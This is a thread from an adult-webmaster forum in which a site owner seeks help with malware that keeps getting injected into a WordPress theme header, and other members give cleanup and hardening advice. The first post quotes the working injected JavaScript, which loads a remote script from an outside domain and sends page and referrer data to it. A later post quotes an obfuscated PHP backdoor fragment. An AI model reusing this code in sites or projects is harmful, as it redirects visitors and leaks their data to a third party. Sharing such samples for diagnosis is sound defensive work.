![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Scripts inserted in my WP themes header
somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample. How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script> |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 | |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Quote:
Without accuse any company you should look into this too.
__________________
Tube - Cam - Escorts - Top List Menu Tab - Banner - Header Link - Blog Post DM me ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
Confirmed User
Industry Role:
Join Date: Feb 2005
Posts: 1,699
|
I would suggest:
Check out these links on making Wordpress more secure: https://codex.wordpress.org/Hardening_WordPress Securing WordPress: Hardening Basics | The State of Security https://www.wordfence.com/learn/how-...rdpress-sites/ |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Thanks. everything started when I used an ad networks script months ago, then stopped, then cleaned the whole site, but it has been returning many many times
All plugins are from WP repository. The problem is that the issue happens every day or every two days so running without a plug in per day test may end like next year and still it may harm the website. the 3 admins are me and the developers I had to hire to fix the issue. no one else has logged in to the site as admin in the past weeks is there a way to block scripts? |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
Many think those are legit outbound but THEY ARE NOT. ![]() Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.
__________________
Tube - Cam - Escorts - Top List Menu Tab - Banner - Header Link - Blog Post DM me ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
![]()
__________________
![]() I've referred over $1.7mil in spending this past year, you should join in. ![]() ![]() I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years.. ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 | |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Quote:
At this point if your tech can't fix it try another one mate. Or worst case change Theme. ![]() Good Luck and keep us posted ![]()
__________________
Tube - Cam - Escorts - Top List Menu Tab - Banner - Header Link - Blog Post DM me ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 | |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
Quote:
Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri. Hope this helps.
__________________
![]() I've referred over $1.7mil in spending this past year, you should join in. ![]() ![]() I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years.. ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
__________________
Tube - Cam - Escorts - Top List Menu Tab - Banner - Header Link - Blog Post DM me ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#12 |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
I removed it, but that was just sucuri.net showing the malware in plain text.
__________________
![]() I've referred over $1.7mil in spending this past year, you should join in. ![]() ![]() I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years.. ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
ok thanks.. will let you know if something of this works out
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 |
Webmaster
Industry Role:
Join Date: Jun 2004
Posts: 14,294
|
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.
We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe. They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 |
Confirmed User
Join Date: Nov 2001
Location: Redmond, WA
Posts: 2,727
|
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 |
So Fucking Banned
Join Date: Aug 2002
Posts: 10,300
|
That's what you get not keeping software up to date, op.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
Affiliate
Industry Role:
Join Date: Feb 2008
Posts: 241
|
You probably already have tried some malware plugins - but if you havent tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
__________________
Porn Affiliate Programs - The Best Affiliate Programs & Some Webmaster Resources Like Free WP Themes. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#19 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
thanks guys and tahnsk for the recommendations.
a i am not tech savy and the person helping me is MIA i tried to find the issue myself what is the dirs.php file supposed to do? i think that is one of the issues. it has crap like this one ${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content))); |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#21 | |
Confirmed User
Industry Role:
Join Date: Feb 2005
Posts: 1,699
|
Quote:
If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised. I would suggest trying this, in this order:
If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#22 | |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
Quote:
There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.
__________________
![]() I've referred over $1.7mil in spending this past year, you should join in. ![]() ![]() I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years.. ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#23 | |
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 3,064
|
Quote:
I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0" If you want to fix this error. You may want to look for your hack though. Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated. Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password? I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.
__________________
Live Sex Shows |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#24 |
So Fucking Banned
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
|
ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.
https://aw-snap.info/file-viewer/ I found this online website scanning tool very helpful This is a terrible, terrible thing ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#25 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Thanks to everybody!
Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#26 |
So fuckin' bored
Industry Role:
Join Date: Jun 2003
Posts: 32,381
|
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
__________________
Obey the Cowgod |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#27 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
all plugins were download from the WP repository... files were cleared... but script returned again =(
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#28 | |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Quote:
![]() ![]() I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours ![]() At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.
__________________
Tube - Cam - Escorts - Top List Menu Tab - Banner - Header Link - Blog Post DM me ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#29 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#30 |
Confirmed User
Industry Role:
Join Date: Feb 2005
Posts: 1,699
|
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.
One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#31 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#32 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
seems it is finally solved. thanks to you all!
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#33 |
So Fucking Banned
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
|
oh it's never solved
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#34 |
So Fucking Banned
Industry Role:
Join Date: Apr 2003
Location: online
Posts: 8,766
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#35 |
Confirmed User
Industry Role:
Join Date: Oct 2003
Location: L.A.
Posts: 5,744
|
They may likely made many backdoor shells. Beat bet is to format, then import only posts from old database on fresh install.
__________________
![]() ![]() * Handwritten * 180 C Class IPs * Permanent! * Many Niches! * Bulk Discounts! GFYPosts /at/ J2Media.net |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#36 |
Registered User
Industry Role:
Join Date: Oct 2014
Posts: 9
|
Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#37 |
VIP
Industry Role:
Join Date: Jul 2013
Posts: 22,111
|
I am also curious after reading all of this.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#38 |
Webmaster
Industry Role:
Join Date: Jun 2004
Posts: 14,294
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#39 |
Confirmed User
Industry Role:
Join Date: Jun 2012
Posts: 457
|
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#40 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
I actually never downloaded any plugin or script from BHW. i remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#41 |
Confirmed Chicago Pimp
Industry Role:
Join Date: Aug 2004
Location: Chicago
Posts: 7,100
|
Basics....
https://ithemes.com/2016/10/13/how-t...ly-and-easily/ Good plugin... https://wordpress.org/plugins/all-in...-and-firewall/ If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan. ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#42 |
Richest man in Babylon
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,687
|
It is possible to clean out a hacked Wordpress setup and indeed I have done it.
One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server. If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to so it's a lot easier to prevent it. It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#43 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
thank you! I hope all this also helps somebody else who may have similar issues in the future
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#44 | |
Webmaster
Industry Role:
Join Date: Jun 2004
Posts: 14,294
|
Quote:
We had spend 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS. P.S. they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |